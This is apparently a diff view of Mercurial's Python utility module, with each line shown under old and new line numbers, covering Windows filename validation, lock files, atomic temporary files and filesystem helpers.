1740 hardlink = False
1750 hardlink = False
1741 shutil.copy(src, dst)
1751 shutil.copy(src, dst)
1742 else:
1752 else:
1743 shutil.copy(src, dst)
1753 shutil.copy(src, dst)
1744 num += 1
1754 num += 1
1745 if progress:
1755 if progress:
1746 progress.increment()
1756 progress.increment()
1747
1757
1748 return hardlink, num
1758 return hardlink, num
1749
1759
1750 _winreservednames = {
1760 _winreservednames = {
1751 'con', 'prn', 'aux', 'nul',
1761 'con', 'prn', 'aux', 'nul',
1752 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1762 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1753 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1763 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1754 }
1764 }
1755 _winreservedchars = ':*?"<>|'
1765 _winreservedchars = ':*?"<>|'
1756 def checkwinfilename(path):
1766 def checkwinfilename(path):
1757 r'''Check that the base-relative path is a valid filename on Windows.
1767 r'''Check that the base-relative path is a valid filename on Windows.
1758 Returns None if the path is ok, or a UI string describing the problem.
1768 Returns None if the path is ok, or a UI string describing the problem.
1759
1769
1760 >>> checkwinfilename(b"just/a/normal/path")
1770 >>> checkwinfilename(b"just/a/normal/path")
1761 >>> checkwinfilename(b"foo/bar/con.xml")
1771 >>> checkwinfilename(b"foo/bar/con.xml")
1762 "filename contains 'con', which is reserved on Windows"
1772 "filename contains 'con', which is reserved on Windows"
1763 >>> checkwinfilename(b"foo/con.xml/bar")
1773 >>> checkwinfilename(b"foo/con.xml/bar")
1764 "filename contains 'con', which is reserved on Windows"
1774 "filename contains 'con', which is reserved on Windows"
1765 >>> checkwinfilename(b"foo/bar/xml.con")
1775 >>> checkwinfilename(b"foo/bar/xml.con")
1766 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1776 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1767 "filename contains 'AUX', which is reserved on Windows"
1777 "filename contains 'AUX', which is reserved on Windows"
1768 >>> checkwinfilename(b"foo/bar/bla:.txt")
1778 >>> checkwinfilename(b"foo/bar/bla:.txt")
1769 "filename contains ':', which is reserved on Windows"
1779 "filename contains ':', which is reserved on Windows"
1770 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1780 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1771 "filename contains '\\x07', which is invalid on Windows"
1781 "filename contains '\\x07', which is invalid on Windows"
1772 >>> checkwinfilename(b"foo/bar/bla ")
1782 >>> checkwinfilename(b"foo/bar/bla ")
1773 "filename ends with ' ', which is not allowed on Windows"
1783 "filename ends with ' ', which is not allowed on Windows"
1774 >>> checkwinfilename(b"../bar")
1784 >>> checkwinfilename(b"../bar")
1775 >>> checkwinfilename(b"foo\\")
1785 >>> checkwinfilename(b"foo\\")
1776 "filename ends with '\\', which is invalid on Windows"
1786 "filename ends with '\\', which is invalid on Windows"
1777 >>> checkwinfilename(b"foo\\/bar")
1787 >>> checkwinfilename(b"foo\\/bar")
1778 "directory name ends with '\\', which is invalid on Windows"
1788 "directory name ends with '\\', which is invalid on Windows"
1779 '''
1789 '''
1780 if path.endswith('\\'):
1790 if path.endswith('\\'):
1781 return _("filename ends with '\\', which is invalid on Windows")
1791 return _("filename ends with '\\', which is invalid on Windows")
1782 if '\\/' in path:
1792 if '\\/' in path:
1783 return _("directory name ends with '\\', which is invalid on Windows")
1793 return _("directory name ends with '\\', which is invalid on Windows")
1784 for n in path.replace('\\', '/').split('/'):
1794 for n in path.replace('\\', '/').split('/'):
1785 if not n:
1795 if not n:
1786 continue
1796 continue
1787 for c in _filenamebytestr(n):
1797 for c in _filenamebytestr(n):
1788 if c in _winreservedchars:
1798 if c in _winreservedchars:
1789 return _("filename contains '%s', which is reserved "
1799 return _("filename contains '%s', which is reserved "
1790 "on Windows") % c
1800 "on Windows") % c
1791 if ord(c) <= 31:
1801 if ord(c) <= 31:
1792 return _("filename contains '%s', which is invalid "
1802 return _("filename contains '%s', which is invalid "
1793 "on Windows") % stringutil.escapestr(c)
1803 "on Windows") % stringutil.escapestr(c)
1794 base = n.split('.')[0]
1804 base = n.split('.')[0]
1795 if base and base.lower() in _winreservednames:
1805 if base and base.lower() in _winreservednames:
1796 return _("filename contains '%s', which is reserved "
1806 return _("filename contains '%s', which is reserved "
1797 "on Windows") % base
1807 "on Windows") % base
1798 t = n[-1:]
1808 t = n[-1:]
1799 if t in '. ' and n not in '..':
1809 if t in '. ' and n not in '..':
1800 return _("filename ends with '%s', which is not allowed "
1810 return _("filename ends with '%s', which is not allowed "
1801 "on Windows") % t
1811 "on Windows") % t
1802
1812
1803 if pycompat.iswindows:
1813 if pycompat.iswindows:
1804 checkosfilename = checkwinfilename
1814 checkosfilename = checkwinfilename
1805 timer = time.clock
1815 timer = time.clock
1806 else:
1816 else:
1807 checkosfilename = platform.checkosfilename
1817 checkosfilename = platform.checkosfilename
1808 timer = time.time
1818 timer = time.time
1809
1819
1810 if safehasattr(time, "perf_counter"):
1820 if safehasattr(time, "perf_counter"):
1811 timer = time.perf_counter
1821 timer = time.perf_counter
1812
1822
1813 def makelock(info, pathname):
1823 def makelock(info, pathname):
1814 """Create a lock file atomically if possible
1824 """Create a lock file atomically if possible
1815
1825
1816 This may leave a stale lock file if symlink isn't supported and signal
1826 This may leave a stale lock file if symlink isn't supported and signal
1817 interrupt is enabled.
1827 interrupt is enabled.
1818 """
1828 """
1819 try:
1829 try:
1820 return os.symlink(info, pathname)
1830 return os.symlink(info, pathname)
1821 except OSError as why:
1831 except OSError as why:
1822 if why.errno == errno.EEXIST:
1832 if why.errno == errno.EEXIST:
1823 raise
1833 raise
1824 except AttributeError: # no symlink in os
1834 except AttributeError: # no symlink in os
1825 pass
1835 pass
1826
1836
1827 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1837 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1828 ld = os.open(pathname, flags)
1838 ld = os.open(pathname, flags)
1829 os.write(ld, info)
1839 os.write(ld, info)
1830 os.close(ld)
1840 os.close(ld)
1831
1841
1832 def readlock(pathname):
1842 def readlock(pathname):
1833 try:
1843 try:
1834 return os.readlink(pathname)
1844 return os.readlink(pathname)
1835 except OSError as why:
1845 except OSError as why:
1836 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1846 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1837 raise
1847 raise
1838 except AttributeError: # no symlink in os
1848 except AttributeError: # no symlink in os
1839 pass
1849 pass
1840 fp = posixfile(pathname, 'rb')
1850 fp = posixfile(pathname, 'rb')
1841 r = fp.read()
1851 r = fp.read()
1842 fp.close()
1852 fp.close()
1843 return r
1853 return r
1844
1854
1845 def fstat(fp):
1855 def fstat(fp):
1846 '''stat file object that may not have fileno method.'''
1856 '''stat file object that may not have fileno method.'''
1847 try:
1857 try:
1848 return os.fstat(fp.fileno())
1858 return os.fstat(fp.fileno())
1849 except AttributeError:
1859 except AttributeError:
1850 return os.stat(fp.name)
1860 return os.stat(fp.name)
1851
1861
1852 # File system features
1862 # File system features
1853
1863
1854 def fscasesensitive(path):
1864 def fscasesensitive(path):
1855 """
1865 """
1856 Return true if the given path is on a case-sensitive filesystem
1866 Return true if the given path is on a case-sensitive filesystem
1857
1867
1858 Requires a path (like /foo/.hg) ending with a foldable final
1868 Requires a path (like /foo/.hg) ending with a foldable final
1859 directory component.
1869 directory component.
1860 """
1870 """
1861 s1 = os.lstat(path)
1871 s1 = os.lstat(path)
1862 d, b = os.path.split(path)
1872 d, b = os.path.split(path)
1863 b2 = b.upper()
1873 b2 = b.upper()
1864 if b == b2:
1874 if b == b2:
1865 b2 = b.lower()
1875 b2 = b.lower()
1866 if b == b2:
1876 if b == b2:
1867 return True # no evidence against case sensitivity
1877 return True # no evidence against case sensitivity
1868 p2 = os.path.join(d, b2)
1878 p2 = os.path.join(d, b2)
1869 try:
1879 try:
1870 s2 = os.lstat(p2)
1880 s2 = os.lstat(p2)
1871 if s2 == s1:
1881 if s2 == s1:
1872 return False
1882 return False
1873 return True
1883 return True
1874 except OSError:
1884 except OSError:
1875 return True
1885 return True
1876
1886
1877 try:
1887 try:
1878 import re2
1888 import re2
1879 _re2 = None
1889 _re2 = None
1880 except ImportError:
1890 except ImportError:
1881 _re2 = False
1891 _re2 = False
1882
1892
1883 class _re(object):
1893 class _re(object):
1884 def _checkre2(self):
1894 def _checkre2(self):
1885 global _re2
1895 global _re2
1886 try:
1896 try:
1887 # check if match works, see issue3964
1897 # check if match works, see issue3964
1888 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1898 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1889 except ImportError:
1899 except ImportError:
1890 _re2 = False
1900 _re2 = False
1891
1901
1892 def compile(self, pat, flags=0):
1902 def compile(self, pat, flags=0):
1893 '''Compile a regular expression, using re2 if possible
1903 '''Compile a regular expression, using re2 if possible
1894
1904
1895 For best performance, use only re2-compatible regexp features. The
1905 For best performance, use only re2-compatible regexp features. The
1896 only flags from the re module that are re2-compatible are
1906 only flags from the re module that are re2-compatible are
1897 IGNORECASE and MULTILINE.'''
1907 IGNORECASE and MULTILINE.'''
1898 if _re2 is None:
1908 if _re2 is None:
1899 self._checkre2()
1909 self._checkre2()
1900 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1910 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1901 if flags & remod.IGNORECASE:
1911 if flags & remod.IGNORECASE:
1902 pat = '(?i)' + pat
1912 pat = '(?i)' + pat
1903 if flags & remod.MULTILINE:
1913 if flags & remod.MULTILINE:
1904 pat = '(?m)' + pat
1914 pat = '(?m)' + pat
1905 try:
1915 try:
1906 return re2.compile(pat)
1916 return re2.compile(pat)
1907 except re2.error:
1917 except re2.error:
1908 pass
1918 pass
1909 return remod.compile(pat, flags)
1919 return remod.compile(pat, flags)
1910
1920
1911 @propertycache
1921 @propertycache
1912 def escape(self):
1922 def escape(self):
1913 '''Return the version of escape corresponding to self.compile.
1923 '''Return the version of escape corresponding to self.compile.
1914
1924
1915 This is imperfect because whether re2 or re is used for a particular
1925 This is imperfect because whether re2 or re is used for a particular
1916 function depends on the flags, etc, but it's the best we can do.
1926 function depends on the flags, etc, but it's the best we can do.
1917 '''
1927 '''
1918 global _re2
1928 global _re2
1919 if _re2 is None:
1929 if _re2 is None:
1920 self._checkre2()
1930 self._checkre2()
1921 if _re2:
1931 if _re2:
1922 return re2.escape
1932 return re2.escape
1923 else:
1933 else:
1924 return remod.escape
1934 return remod.escape
1925
1935
1926 re = _re()
1936 re = _re()
1927
1937
1928 _fspathcache = {}
1938 _fspathcache = {}
1929 def fspath(name, root):
1939 def fspath(name, root):
1930 '''Get name in the case stored in the filesystem
1940 '''Get name in the case stored in the filesystem
1931
1941
1932 The name should be relative to root, and be normcase-ed for efficiency.
1942 The name should be relative to root, and be normcase-ed for efficiency.
1933
1943
1934 Note that this function is unnecessary, and should not be
1944 Note that this function is unnecessary, and should not be
1935 called, for case-sensitive filesystems (simply because it's expensive).
1945 called, for case-sensitive filesystems (simply because it's expensive).
1936
1946
1937 The root should be normcase-ed, too.
1947 The root should be normcase-ed, too.
1938 '''
1948 '''
1939 def _makefspathcacheentry(dir):
1949 def _makefspathcacheentry(dir):
1940 return dict((normcase(n), n) for n in os.listdir(dir))
1950 return dict((normcase(n), n) for n in os.listdir(dir))
1941
1951
1942 seps = pycompat.ossep
1952 seps = pycompat.ossep
1943 if pycompat.osaltsep:
1953 if pycompat.osaltsep:
1944 seps = seps + pycompat.osaltsep
1954 seps = seps + pycompat.osaltsep
1945 # Protect backslashes. This gets silly very quickly.
1955 # Protect backslashes. This gets silly very quickly.
1946 seps.replace('\\','\\\\')
1956 seps.replace('\\','\\\\')
1947 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1957 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1948 dir = os.path.normpath(root)
1958 dir = os.path.normpath(root)
1949 result = []
1959 result = []
1950 for part, sep in pattern.findall(name):
1960 for part, sep in pattern.findall(name):
1951 if sep:
1961 if sep:
1952 result.append(sep)
1962 result.append(sep)
1953 continue
1963 continue
1954
1964
1955 if dir not in _fspathcache:
1965 if dir not in _fspathcache:
1956 _fspathcache[dir] = _makefspathcacheentry(dir)
1966 _fspathcache[dir] = _makefspathcacheentry(dir)
1957 contents = _fspathcache[dir]
1967 contents = _fspathcache[dir]
1958
1968
1959 found = contents.get(part)
1969 found = contents.get(part)
1960 if not found:
1970 if not found:
1961 # retry "once per directory" per "dirstate.walk" which
1971 # retry "once per directory" per "dirstate.walk" which
1962 # may take place for each patches of "hg qpush", for example
1972 # may take place for each patches of "hg qpush", for example
1963 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1973 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1964 found = contents.get(part)
1974 found = contents.get(part)
1965
1975
1966 result.append(found or part)
1976 result.append(found or part)
1967 dir = os.path.join(dir, part)
1977 dir = os.path.join(dir, part)
1968
1978
1969 return ''.join(result)
1979 return ''.join(result)
1970
1980
1971 def checknlink(testfile):
1981 def checknlink(testfile):
1972 '''check whether hardlink count reporting works properly'''
1982 '''check whether hardlink count reporting works properly'''
1973
1983
1974 # testfile may be open, so we need a separate file for checking to
1984 # testfile may be open, so we need a separate file for checking to
1975 # work around issue2543 (or testfile may get lost on Samba shares)
1985 # work around issue2543 (or testfile may get lost on Samba shares)
1976 f1, f2, fp = None, None, None
1986 f1, f2, fp = None, None, None
1977 try:
1987 try:
1978 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1988 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1979 suffix='1~', dir=os.path.dirname(testfile))
1989 suffix='1~', dir=os.path.dirname(testfile))
1980 os.close(fd)
1990 os.close(fd)
1981 f2 = '%s2~' % f1[:-2]
1991 f2 = '%s2~' % f1[:-2]
1982
1992
1983 oslink(f1, f2)
1993 oslink(f1, f2)
1984 # nlinks() may behave differently for files on Windows shares if
1994 # nlinks() may behave differently for files on Windows shares if
1985 # the file is open.
1995 # the file is open.
1986 fp = posixfile(f2)
1996 fp = posixfile(f2)
1987 return nlinks(f2) > 1
1997 return nlinks(f2) > 1
1988 except OSError:
1998 except OSError:
1989 return False
1999 return False
1990 finally:
2000 finally:
1991 if fp is not None:
2001 if fp is not None:
1992 fp.close()
2002 fp.close()
1993 for f in (f1, f2):
2003 for f in (f1, f2):
1994 try:
2004 try:
1995 if f is not None:
2005 if f is not None:
1996 os.unlink(f)
2006 os.unlink(f)
1997 except OSError:
2007 except OSError:
1998 pass
2008 pass
1999
2009
2000 def endswithsep(path):
2010 def endswithsep(path):
2001 '''Check path ends with os.sep or os.altsep.'''
2011 '''Check path ends with os.sep or os.altsep.'''
2002 return (path.endswith(pycompat.ossep)
2012 return (path.endswith(pycompat.ossep)
2003 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2013 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2004
2014
2005 def splitpath(path):
2015 def splitpath(path):
2006 '''Split path by os.sep.
2016 '''Split path by os.sep.
2007 Note that this function does not use os.altsep because this is
2017 Note that this function does not use os.altsep because this is
2008 an alternative of simple "xxx.split(os.sep)".
2018 an alternative of simple "xxx.split(os.sep)".
2009 It is recommended to use os.path.normpath() before using this
2019 It is recommended to use os.path.normpath() before using this
2010 function if need.'''
2020 function if need.'''
2011 return path.split(pycompat.ossep)
2021 return path.split(pycompat.ossep)
2012
2022
2013 def mktempcopy(name, emptyok=False, createmode=None):
2023 def mktempcopy(name, emptyok=False, createmode=None):
2014 """Create a temporary file with the same contents from name
2024 """Create a temporary file with the same contents from name
2015
2025
2016 The permission bits are copied from the original file.
2026 The permission bits are copied from the original file.
2017
2027
2018 If the temporary file is going to be truncated immediately, you
2028 If the temporary file is going to be truncated immediately, you
2019 can use emptyok=True as an optimization.
2029 can use emptyok=True as an optimization.
2020
2030
2021 Returns the name of the temporary file.
2031 Returns the name of the temporary file.
2022 """
2032 """
2023 d, fn = os.path.split(name)
2033 d, fn = os.path.split(name)
2024 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2034 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2025 os.close(fd)
2035 os.close(fd)
2026 # Temporary files are created with mode 0600, which is usually not
2036 # Temporary files are created with mode 0600, which is usually not
2027 # what we want. If the original file already exists, just copy
2037 # what we want. If the original file already exists, just copy
2028 # its mode. Otherwise, manually obey umask.
2038 # its mode. Otherwise, manually obey umask.
2029 copymode(name, temp, createmode)
2039 copymode(name, temp, createmode)
2030 if emptyok:
2040 if emptyok:
2031 return temp
2041 return temp
2032 try:
2042 try:
2033 try:
2043 try:
2034 ifp = posixfile(name, "rb")
2044 ifp = posixfile(name, "rb")
2035 except IOError as inst:
2045 except IOError as inst:
2036 if inst.errno == errno.ENOENT:
2046 if inst.errno == errno.ENOENT:
2037 return temp
2047 return temp
2038 if not getattr(inst, 'filename', None):
2048 if not getattr(inst, 'filename', None):
2039 inst.filename = name
2049 inst.filename = name
2040 raise
2050 raise
2041 ofp = posixfile(temp, "wb")
2051 ofp = posixfile(temp, "wb")
2042 for chunk in filechunkiter(ifp):
2052 for chunk in filechunkiter(ifp):
2043 ofp.write(chunk)
2053 ofp.write(chunk)
2044 ifp.close()
2054 ifp.close()
2045 ofp.close()
2055 ofp.close()
2046 except: # re-raises
2056 except: # re-raises
2047 try:
2057 try:
2048 os.unlink(temp)
2058 os.unlink(temp)
2049 except OSError:
2059 except OSError:
2050 pass
2060 pass
2051 raise
2061 raise
2052 return temp
2062 return temp
2053
2063
2054 class filestat(object):
2064 class filestat(object):
2055 """help to exactly detect change of a file
2065 """help to exactly detect change of a file
2056
2066
2057 'stat' attribute is result of 'os.stat()' if specified 'path'
2067 'stat' attribute is result of 'os.stat()' if specified 'path'
2058 exists. Otherwise, it is None. This can avoid preparative
2068 exists. Otherwise, it is None. This can avoid preparative
2059 'exists()' examination on client side of this class.
2069 'exists()' examination on client side of this class.
2060 """
2070 """
2061 def __init__(self, stat):
2071 def __init__(self, stat):
2062 self.stat = stat
2072 self.stat = stat
2063
2073
2064 @classmethod
2074 @classmethod
2065 def frompath(cls, path):
2075 def frompath(cls, path):
2066 try:
2076 try:
2067 stat = os.stat(path)
2077 stat = os.stat(path)
2068 except OSError as err:
2078 except OSError as err:
2069 if err.errno != errno.ENOENT:
2079 if err.errno != errno.ENOENT:
2070 raise
2080 raise
2071 stat = None
2081 stat = None
2072 return cls(stat)
2082 return cls(stat)
2073
2083
2074 @classmethod
2084 @classmethod
2075 def fromfp(cls, fp):
2085 def fromfp(cls, fp):
2076 stat = os.fstat(fp.fileno())
2086 stat = os.fstat(fp.fileno())
2077 return cls(stat)
2087 return cls(stat)
2078
2088
2079 __hash__ = object.__hash__
2089 __hash__ = object.__hash__
2080
2090
2081 def __eq__(self, old):
2091 def __eq__(self, old):
2082 try:
2092 try:
2083 # if ambiguity between stat of new and old file is
2093 # if ambiguity between stat of new and old file is
2084 # avoided, comparison of size, ctime and mtime is enough
2094 # avoided, comparison of size, ctime and mtime is enough
2085 # to exactly detect change of a file regardless of platform
2095 # to exactly detect change of a file regardless of platform
2086 return (self.stat.st_size == old.stat.st_size and
2096 return (self.stat.st_size == old.stat.st_size and
2087 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2097 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2088 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2098 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2089 except AttributeError:
2099 except AttributeError:
2090 pass
2100 pass
2091 try:
2101 try:
2092 return self.stat is None and old.stat is None
2102 return self.stat is None and old.stat is None
2093 except AttributeError:
2103 except AttributeError:
2094 return False
2104 return False
2095
2105
2096 def isambig(self, old):
2106 def isambig(self, old):
2097 """Examine whether new (= self) stat is ambiguous against old one
2107 """Examine whether new (= self) stat is ambiguous against old one
2098
2108
2099 "S[N]" below means stat of a file at N-th change:
2109 "S[N]" below means stat of a file at N-th change:
2100
2110
2101 - S[n-1].ctime < S[n].ctime: can detect change of a file
2111 - S[n-1].ctime < S[n].ctime: can detect change of a file
2102 - S[n-1].ctime == S[n].ctime
2112 - S[n-1].ctime == S[n].ctime
2103 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2113 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2104 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2114 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2105 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2115 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2106 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2116 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2107
2117
2108 Case (*2) above means that a file was changed twice or more at
2118 Case (*2) above means that a file was changed twice or more at
2109 same time in sec (= S[n-1].ctime), and comparison of timestamp
2119 same time in sec (= S[n-1].ctime), and comparison of timestamp
2110 is ambiguous.
2120 is ambiguous.
2111
2121
2112 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2122 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2113 timestamp is ambiguous".
2123 timestamp is ambiguous".
2114
2124
2115 But advancing mtime only in case (*2) doesn't work as
2125 But advancing mtime only in case (*2) doesn't work as
2116 expected, because naturally advanced S[n].mtime in case (*1)
2126 expected, because naturally advanced S[n].mtime in case (*1)
2117 might be equal to manually advanced S[n-1 or earlier].mtime.
2127 might be equal to manually advanced S[n-1 or earlier].mtime.
2118
2128
2119 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2129 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2120 treated as ambiguous regardless of mtime, to avoid overlooking
2130 treated as ambiguous regardless of mtime, to avoid overlooking
2121 by confliction between such mtime.
2131 by confliction between such mtime.
2122
2132
2123 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2133 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2124 S[n].mtime", even if size of a file isn't changed.
2134 S[n].mtime", even if size of a file isn't changed.
2125 """
2135 """
2126 try:
2136 try:
2127 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2137 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2128 except AttributeError:
2138 except AttributeError:
2129 return False
2139 return False
2130
2140
2131 def avoidambig(self, path, old):
2141 def avoidambig(self, path, old):
2132 """Change file stat of specified path to avoid ambiguity
2142 """Change file stat of specified path to avoid ambiguity
2133
2143
2134 'old' should be previous filestat of 'path'.
2144 'old' should be previous filestat of 'path'.
2135
2145
2136 This skips avoiding ambiguity, if a process doesn't have
2146 This skips avoiding ambiguity, if a process doesn't have
2137 appropriate privileges for 'path'. This returns False in this
2147 appropriate privileges for 'path'. This returns False in this
2138 case.
2148 case.
2139
2149
2140 Otherwise, this returns True, as "ambiguity is avoided".
2150 Otherwise, this returns True, as "ambiguity is avoided".
2141 """
2151 """
2142 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2152 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2143 try:
2153 try:
2144 os.utime(path, (advanced, advanced))
2154 os.utime(path, (advanced, advanced))
2145 except OSError as inst:
2155 except OSError as inst:
2146 if inst.errno == errno.EPERM:
2156 if inst.errno == errno.EPERM:
2147 # utime() on the file created by another user causes EPERM,
2157 # utime() on the file created by another user causes EPERM,
2148 # if a process doesn't have appropriate privileges
2158 # if a process doesn't have appropriate privileges
2149 return False
2159 return False
2150 raise
2160 raise
2151 return True
2161 return True
2152
2162
2153 def __ne__(self, other):
2163 def __ne__(self, other):
2154 return not self == other
2164 return not self == other
2155
2165
2156 class atomictempfile(object):
2166 class atomictempfile(object):
2157 '''writable file object that atomically updates a file
2167 '''writable file object that atomically updates a file
2158
2168
2159 All writes will go to a temporary copy of the original file. Call
2169 All writes will go to a temporary copy of the original file. Call
2160 close() when you are done writing, and atomictempfile will rename
2170 close() when you are done writing, and atomictempfile will rename
2161 the temporary copy to the original name, making the changes
2171 the temporary copy to the original name, making the changes
2162 visible. If the object is destroyed without being closed, all your
2172 visible. If the object is destroyed without being closed, all your
2163 writes are discarded.
2173 writes are discarded.
2164
2174
2165 checkambig argument of constructor is used with filestat, and is
2175 checkambig argument of constructor is used with filestat, and is
2166 useful only if target file is guarded by any lock (e.g. repo.lock
2176 useful only if target file is guarded by any lock (e.g. repo.lock
2167 or repo.wlock).
2177 or repo.wlock).
2168 '''
2178 '''
2169 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2179 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2170 self.__name = name # permanent name
2180 self.__name = name # permanent name
2171 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2181 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2172 createmode=createmode)
2182 createmode=createmode)
2173 self._fp = posixfile(self._tempname, mode)
2183 self._fp = posixfile(self._tempname, mode)
2174 self._checkambig = checkambig
2184 self._checkambig = checkambig
2175
2185
2176 # delegated methods
2186 # delegated methods
2177 self.read = self._fp.read
2187 self.read = self._fp.read
2178 self.write = self._fp.write
2188 self.write = self._fp.write
2179 self.seek = self._fp.seek
2189 self.seek = self._fp.seek
2180 self.tell = self._fp.tell
2190 self.tell = self._fp.tell
2181 self.fileno = self._fp.fileno
2191 self.fileno = self._fp.fileno
2182
2192
2183 def close(self):
2193 def close(self):
2184 if not self._fp.closed:
2194 if not self._fp.closed:
2185 self._fp.close()
2195 self._fp.close()
2186 filename = localpath(self.__name)
2196 filename = localpath(self.__name)
2187 oldstat = self._checkambig and filestat.frompath(filename)
2197 oldstat = self._checkambig and filestat.frompath(filename)
2188 if oldstat and oldstat.stat:
2198 if oldstat and oldstat.stat:
2189 rename(self._tempname, filename)
2199 rename(self._tempname, filename)
2190 newstat = filestat.frompath(filename)
2200 newstat = filestat.frompath(filename)
2191 if newstat.isambig(oldstat):
2201 if newstat.isambig(oldstat):
2192 # stat of changed file is ambiguous to original one
2202 # stat of changed file is ambiguous to original one
2193 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2203 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2194 os.utime(filename, (advanced, advanced))
2204 os.utime(filename, (advanced, advanced))
2195 else:
2205 else:
2196 rename(self._tempname, filename)
2206 rename(self._tempname, filename)
2197
2207
2198 def discard(self):
2208 def discard(self):
2199 if not self._fp.closed:
2209 if not self._fp.closed:
2200 try:
2210 try:
2201 os.unlink(self._tempname)
2211 os.unlink(self._tempname)
2202 except OSError:
2212 except OSError:
2203 pass
2213 pass
2204 self._fp.close()
2214 self._fp.close()
2205
2215
2206 def __del__(self):
2216 def __del__(self):
2207 if safehasattr(self, '_fp'): # constructor actually did something
2217 if safehasattr(self, '_fp'): # constructor actually did something
2208 self.discard()
2218 self.discard()
2209
2219
2210 def __enter__(self):
2220 def __enter__(self):
2211 return self
2221 return self
2212
2222
2213 def __exit__(self, exctype, excvalue, traceback):
2223 def __exit__(self, exctype, excvalue, traceback):
2214 if exctype is not None:
2224 if exctype is not None:
2215 self.discard()
2225 self.discard()
2216 else:
2226 else:
2217 self.close()
2227 self.close()
2218
2228
2219 def unlinkpath(f, ignoremissing=False, rmdir=True):
2229 def unlinkpath(f, ignoremissing=False, rmdir=True):
2220 """unlink and remove the directory if it is empty"""
2230 """unlink and remove the directory if it is empty"""
2221 if ignoremissing:
2231 if ignoremissing:
2222 tryunlink(f)
2232 tryunlink(f)
2223 else:
2233 else:
2224 unlink(f)
2234 unlink(f)
2225 if rmdir:
2235 if rmdir:
2226 # try removing directories that might now be empty
2236 # try removing directories that might now be empty
2227 try:
2237 try:
2228 removedirs(os.path.dirname(f))
2238 removedirs(os.path.dirname(f))
2229 except OSError:
2239 except OSError:
2230 pass
2240 pass
2231
2241
2232 def tryunlink(f):
2242 def tryunlink(f):
2233 """Attempt to remove a file, ignoring ENOENT errors."""
2243 """Attempt to remove a file, ignoring ENOENT errors."""
2234 try:
2244 try:
2235 unlink(f)
2245 unlink(f)
2236 except OSError as e:
2246 except OSError as e:
2237 if e.errno != errno.ENOENT:
2247 if e.errno != errno.ENOENT:
2238 raise
2248 raise
2239
2249
2240 def makedirs(name, mode=None, notindexed=False):
2250 def makedirs(name, mode=None, notindexed=False):
2241 """recursive directory creation with parent mode inheritance
2251 """recursive directory creation with parent mode inheritance
2242
2252
2243 Newly created directories are marked as "not to be indexed by
2253 Newly created directories are marked as "not to be indexed by
2244 the content indexing service", if ``notindexed`` is specified
2254 the content indexing service", if ``notindexed`` is specified
2245 for "write" mode access.
2255 for "write" mode access.
2246 """
2256 """
2247 try:
2257 try:
2248 makedir(name, notindexed)
2258 makedir(name, notindexed)
2249 except OSError as err:
2259 except OSError as err:
2250 if err.errno == errno.EEXIST:
2260 if err.errno == errno.EEXIST:
2251 return
2261 return
2252 if err.errno != errno.ENOENT or not name:
2262 if err.errno != errno.ENOENT or not name:
2253 raise
2263 raise
2254 parent = os.path.dirname(os.path.abspath(name))
2264 parent = os.path.dirname(os.path.abspath(name))
2255 if parent == name:
2265 if parent == name:
2256 raise
